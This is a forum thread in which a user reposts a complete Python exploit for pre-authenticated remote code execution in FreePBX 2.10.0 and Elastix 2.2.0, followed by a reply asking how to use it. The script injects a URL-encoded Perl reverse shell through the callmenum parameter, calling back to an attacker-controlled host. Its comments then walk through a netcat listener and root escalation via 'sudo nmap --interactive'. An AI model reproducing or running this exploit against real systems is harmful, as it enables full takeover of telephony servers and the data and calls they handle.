The_Arhitect Posted March 24, 2012 Report Share Posted March 24, 2012 FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit#!/usr/bin/python############################################################# Exploit Title: FreePBX / Elastix pre-authenticated remote code execution exploit# Google Dork: oy vey# Date: March 23rd, 2010# Author: muts# Version: FreePBX 2.10.0/ 2.9.0, Elastix 2.2.0, possibly others.# Tested on: multiple# CVE : notyet# Blog post : http://www.offensive-security.com/vulndev/freepbx-exploit-phone-home/ # Archive Url : http://www.offensive-security.com/0day/freepbx_callmenum.py.txt############################################################# Discovered by Martin Tschirsich# http://seclists.org/fulldisclosure/2012/Mar/234# http://www.exploit-db.com/exploits/18649############################################################import urllibrhost="172.16.254.72"lhost="172.16.254.223"lport=443extension="1000"# Reverse shell payloadurl = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'urllib.urlopen(url)# On Elastix, once we have a shell, we can escalate to root:# root@bt:~# nc -lvp 443# listening on [any] 443 ...# connect to [172.16.254.223] from voip [172.16.254.72] 43415# id# uid=100(asterisk) gid=101(asterisk)# sudo nmap --interactive# Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )# Welcome to Interactive Mode -- press h <enter> for help# nmap> !sh# id# uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)Sursa: FreePBX 2.10.0 / Elastix 2.2.0 Remote Code Execution Exploit Quote Link to comment Share on other sites More sharing options...
BloodLust Posted August 13, 2012 Report Share Posted August 13, 2012 cum se foloseste daca se pot da niste detalii ? Quote Link to comment Share on other sites More sharing options...